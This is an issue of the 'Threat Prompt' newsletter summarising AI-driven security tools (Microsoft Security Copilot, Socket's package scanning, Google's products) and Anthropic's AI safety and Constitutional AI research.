TP#11 Apply AI to Solve Security Challenges at Scale

Plus: Navigating the Complexities of AI Safety

Apr 01, 2023

Welcome to the 11th edition of Threat Prompt, where AI and Cybersecurity intersect…

Five Ideas

1. Introducing Microsoft Security Copilot

Featuring an immutable audit trail, subscribers can ask everyday security questions of a security-specific LLM:

When Security Copilot receives a prompt from a security professional, it uses the full power of the security-specific model to deploy skills and queries that maximize the value of the latest large language model capabilities. And this is unique to a security use-case. Our cyber-trained model adds a learning system to create and tune new skills. Security Copilot then can help catch what other approaches might miss and augment an analyst’s work. In a typical incident, this boost translates into gains in the quality of detection, speed of response and ability to strengthen security posture.
Security Copilot doesn’t always get everything right. AI-generated content can contain mistakes. But Security Copilot is a closed-loop learning system, which means it’s continually learning from users and giving them the opportunity to give explicit feedback with the feedback feature that is built directly into the tool. As we continue to learn from these interactions, we are adjusting its responses to create more coherent, relevant and useful answers.

Watch the 3 minute demo to learn more and see sample use cases. Microsoft continues to be fast out the gate with enterprise-oriented AI solutions.

2. Unpacking AI Safety

Anthropic - an AI safety and research company - is on a mission to build reliable, interpretable, and steerable AI systems.

First, it may be tricky to build safe, reliable, and steerable systems when those systems are starting to become as intelligent and as aware of their surroundings as their designers. To use an analogy, it is easy for a chess grandmaster to detect bad moves in a novice but very hard for a novice to detect bad moves in a grandmaster. If we build an AI system that’s significantly more competent than human experts but it pursues goals that conflict with our best interests, the consequences could be dire. This is the technical alignment problem.
Second, rapid AI progress would be very disruptive, changing employment, macroeconomics, and power structures both within and between nations. These disruptions could be catastrophic in their own right, and they could also make it more difficult to build AI systems in careful, thoughtful ways, leading to further chaos and even more problems with AI.

If you read one thing on AI safety, I recommend this post covering their core views - it’s balanced and informative.

3. Constitutional AI

Reinforcement learning from human feedback (RLHF) is the dominant method a computer program learns how to make better decisions by receiving feedback from humans, much like a teacher giving a student feedback to improve their performance. The program uses this feedback to adjust its actions and improve its decision-making abilities over time.

If AI capabilities are set to exceed human-level performance - first in specific domains, and then more generally (AGI) - we need ways to supervise an AI that don’t rely solely on human feedback since we could get duped!

This is the topic of Anthropics' research paper on scaling supervision:

As AI systems become more capable, we would like to enlist their help to supervise other AIs. We experiment with methods for training a harmless AI assistant through self-improvement, without any human labels identifying harmful outputs. The only human oversight is provided through a list of rules or principles, and so we refer to the method as ‘Constitutional AI’. … The idea is that human supervision will come entirely from a set of principles that should govern AI behavior, along with a small number of examples used for few-shot prompting. Together these principles form the constitution. … We show performance on 438 binary comparison questions intended to evaluate helpfulness, honesty, and harmlessness. We compare the performance of a preference model, trained on human feedback data, to pretrained language models, which evaluate the comparisons as multiple choice questions. We see that chain of thought reasoning significantly improves the performance at this task. The trends suggest that models larger than 52B will be competitive with human feedback-trained preference models.

A related challenge with supervisory AI is the tendency of RLHF-trained models to exhibit evasive behaviour. For instance, when instructed to perform a task that it deems harmful, the AI may refuse to comply without explaining. Sometimes, it may even adopt an accusatory tone, further complicating communication.

The method therefore improves upon, and partially replaces reinforcement learning from human feedback. The new assistant ‘RL-CAI’ is preferred by crowdworkers over those trained with previously collected human feedback labels for harmfulness.
We find that RL-CAI is virtually never evasive, and often gives nuanced and harmless responses to most red team prompts.

As AI adoption and capability grows, developing and refining supervisory AI is crucial to ensure that it is transparent, accountable, and trustworthy.

4. Use ChatGPT to examine every npm and PyPI package for security issues

In just two days, Socket was able to identify and confirm 227 packages that were either vulnerable or contained malware within popular software package repositories:

Socket is now utilizing AI-driven source code analysis with ChatGPT to examine every npm and PyPI package. When a potential issue is detected in a package, we flag it for review and request ChatGPT to summarize its findings. As with all AI-based tools, there may be false positives, and we will not enable this as a default, blocking issue until more feedback is gathered.
One of the core tenets of Socket is to allow developers to make their own judgments about risk so that we do not impede their work. Forcing a developer to analyze every install script, which could cross into different programming languages and even environments, is a lot to ask of a developer–especially if it turns out to be a false positive. AI analysis can assist with this manual audit process. When Socket identifies an issue, such as an install script, we also show the open-source code to ChatGPT to assess the risk. This can significantly speed up determining if something truly is an issue by having an extra reviewer, in this case, ChatGPT, already having done some preliminary work.

What classes of vulnerability did they find? Information exfiltration, injection vulnerabilities, exposed credentials, potential vulnerabilities, backdoors and prompt poisoning…

5. How Google uses AI to improve digital security

As part of a broader blog post on Google’s approach to AI Security, Phil Venables, CISO for Google Cloud and Royal Hansen, VP Engineering for Privacy, Safety, and Security, shared seven examples of existing Google products that use AI at scale to improve security outcomes:

Gmail’s AI-powered spam-filtering capabilities block nearly 10 million spam emails every minute. This keeps 99.9% of phishing attempts and malware from reaching your inbox.
Google’s Safe Browsing, an industry-leading service, uses AI classifiers running directly in the Chrome web browser to warn users about unsafe websites.
IAM recommender uses AI technologies to analyze usage patterns to recommend more secure IAM policies that are custom tailored to an organization’s environment. Once implemented, they can make cloud deployments more secure and cost-effective, with maximum performance.
Chronicle Security Operations and Mandiant Automated Defense use integrated reasoning and machine learning to identify critical alerts, suppress false positives, and generate a security event score to help reduce alert fatigue.
Breach Analytics for Chronicle uses machine learning to calculate a Mandiant IC-Score, a data science-based “maliciousness” scoring algorithm that filters out benign indicators and helps teams focus on relevant, high-priority IOCs. These IOCs are then matched to security data stored in Chronicle to find incidents in need of further investigation.
reCAPTCHA Enterprise and Web Risk use unsupervised learning models to detect clusters of hijacked and fake accounts to help speed up investigation time for analysts and act to protect accounts, and minimize risk.
Cloud Armor Adaptive Protection uses machine learning to automatically detect threats at Layer 7, which contributed to detecting and blocking one of the largest DDoS attacks ever reported.

Bonus Idea

Offline voice chat with the Llama?

Georgi Gerganov announced talk-llama:

LLaMA voice chat + Siri TTS This example is now truly 100% offline since we are now using the built-in Siri text-to-speech available on MacOS through the “say” command It should run on MacOS, Linux and Windows, although for best performance I recommend Apple Silicon

Feedback

Click the emoji that best captures your reaction to this edition…

😍🤯😴😡👍👎

The Threat Prompt Newsletter

Discussion about this post